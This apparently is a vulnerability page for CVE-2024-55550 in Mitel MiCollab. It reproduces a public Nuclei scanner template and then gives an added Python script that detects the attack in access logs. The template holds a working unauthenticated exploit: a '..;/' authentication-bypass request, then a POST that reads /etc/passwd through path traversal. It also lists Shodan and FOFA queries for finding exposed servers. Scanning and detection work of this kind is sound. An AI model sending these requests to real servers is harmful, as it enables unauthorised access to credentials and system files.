The Mitel Collab Arbitrary File Read vulnerability allows an unauthenticated attacker to read arbitrary files from the underlying file system on a Mitel Collab server. Exploiting this flaw involves sending specially crafted requests to the server, bypassing access controls and allowing the attacker to retrieve sensitive files.
PoC code [public]
id: CVE-2024-55550

info:
  name: Mitel MiCollab - Arbitrary File Read
  author: DhiyaneshDk,watchTowr
  severity: critical
  description: |
    The Mitel Collab Arbitrary File Read vulnerability allows an unauthenticated attacker to read arbitrary files from the underlying file system on a Mitel Collab server. Exploiting this flaw involves sending specially crafted requests to the server, bypassing access controls and allowing the attacker to retrieve sensitive files.
  impact: |
    Unauthenticated attackers can bypass authentication and exploit path traversal to read arbitrary files from the MiCollab server, exposing sensitive configuration, credentials, and system data.
  remediation: |
    Update Mitel MiCollab according to MISA-2024-0029 advisory to address the authentication bypass and path traversal vulnerabilities.
  reference:
    - https://github.com/watchtowrlabs/Mitel-MiCollab-Auth-Bypass_CVE-2024-41713
    - https://labs.watchtowr.com/where-theres-smoke-theres-fire-mitel-micollab-cve-2024-35286-cve-2024-41713-and-an-0day/
    - https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2024-0029
  classification:
    epss-score: 0.11277
    epss-percentile: 0.93326
  metadata:
    verified: true
    max-request: 2
    vendor: mitel
    product: cmg_suite
    shodan-query: http.html:"Mitel Networks"
    fofa-query: body="mitel networks"
  tags: cve,cve2024,mitel,lfi,cmg-suite,auth-bypass,kev,vkev,vuln

flow: http(1) && http(2)

http:
  # Request 1: unauthenticated request through the ..;/ path segment.
  # Its matcher is internal and gates request 2 via the flow above.
  - raw:
      - |
        GET /npm-pwg/..;/usp/searchUsers.do HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "users"
          - "Network Element"
        condition: and
        internal: true

  # Request 2: downloadReport operation with a traversal reportName.
  # The matcher looks for passwd-file content in the response body.
  - raw:
      - |
        POST /npm-pwg/..;/ReconcileWizard/reconcilewizard/sc/IDACall?isc_rpc=1&isc_v=&isc_tnum=2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _transaction=%3Ctransaction+xmlns%3Axsi%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2F10%2FXMLSchema-instance%22+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CtransactionNum+xsi%3Atype%3D%22xsd%3Along%22%3E2%3C%2FtransactionNum%3E%3Coperations+xsi%3Atype%3D%22xsd%3AList%22%3E%3Celem+xsi%3Atype%3D%22xsd%3AObject%22%3E%3Ccriteria+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CreportName%3E..%2F..%2F..%2Fetc%2Fpasswd%3C%2FreportName%3E%3C%2Fcriteria%3E%3CoperationConfig+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CdataSource%3Esummary_reports%3C%2FdataSource%3E%3CoperationType%3Efetch%3C%2FoperationType%3E%3C%2FoperationConfig%3E%3CappID%3EbuiltinApplication%3C%2FappID%3E%3Coperation%3EdownloadReport%3C%2Foperation%3E%3ColdValues+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CreportName%3Ex.txt%3C%2FreportName%3E%3C%2FoldValues%3E%3C%2Felem%3E%3C%2Foperations%3E%3Cjscallback%3Ex%3C%2Fjscallback%3E%3C%2Ftransaction%3E&protocolVersion=1.0&__iframeTarget__=x

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "micollab_api:.*:.*"
# digest: 4a0a00473045022100cc51d3841a410df845ff1d3b98875d76332f597d5cf591413ac11d5e9ce6a47a0220403c5c23a6bf6f8986e3fb0c8f69dffcc645852f55a765fca4549cc737d93a88:922c64590222798bb761d5b6d8e72950
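
A log-side check for the two requests in the template above, as an added example that is not part of the original page or the template authors' code. It assumes combined-format access logs and, for the second function, a proxy or WAF that records form bodies; the function names, finding labels and sample data are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Request line and status from a combined-format access log entry (assumed format).
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# A "..;" path segment, as in the template's /npm-pwg/..;/ prefix.
DOTDOT_SEMI = re.compile(r"(^|/)\.\.;[^/]*(/|$)")
REPORT_NAME = re.compile(r"<reportName>([^<]*)</reportName>")

def classify_request(line):
    """Return findings for one access-log line; an empty list means nothing matched."""
    m = REQ_RE.search(line)
    if not m:
        return []
    path = unquote(m.group("target").split("?", 1)[0])  # normalise before matching
    if not DOTDOT_SEMI.search(path):
        return []
    findings = ["dotdot-semicolon-segment"]
    if "/ReconcileWizard/" in path:
        findings.append("reconcilewizard-via-traversal")
    if m.group("status") == "200":
        findings.append("served-200")  # the server answered instead of rejecting
    return findings

def traversal_report_names(form_body):
    """Return reportName values with a '..' path component from a captured form body."""
    tx = parse_qs(form_body).get("_transaction", [""])[0]  # parse_qs URL-decodes
    return [n for n in REPORT_NAME.findall(tx) if ".." in re.split(r"[\\/]", n)]

# Constructed sample data (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2025:10:00:00 +0000] "GET /npm-pwg/..;/usp/searchUsers.do HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jan/2025:10:00:01 +0000] "POST /npm-pwg/..;/ReconcileWizard/reconcilewizard/sc/IDACall?isc_rpc=1 HTTP/1.1" 200 900',
    '198.51.100.7 - - [01/Jan/2025:10:05:00 +0000] "GET /npm-pwg/index.jsp HTTP/1.1" 302 0',
]
SAMPLE_BODY = (
    "_transaction=%3Ctransaction%3E%3CreportName%3E..%2F..%2F..%2Fetc%2Fpasswd%3C%2FreportName%3E"
    "%3ColdValues%3E%3CreportName%3Ex.txt%3C%2FreportName%3E%3C%2FoldValues%3E%3C%2Ftransaction%3E"
    "&protocolVersion=1.0"
)

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(classify_request(entry), entry.split('"')[1])
    print(traversal_report_names(SAMPLE_BODY))
```

A `served-200` finding on a `..;` request is the line to triage first, since a patched or correctly fronted server should not return content for that path.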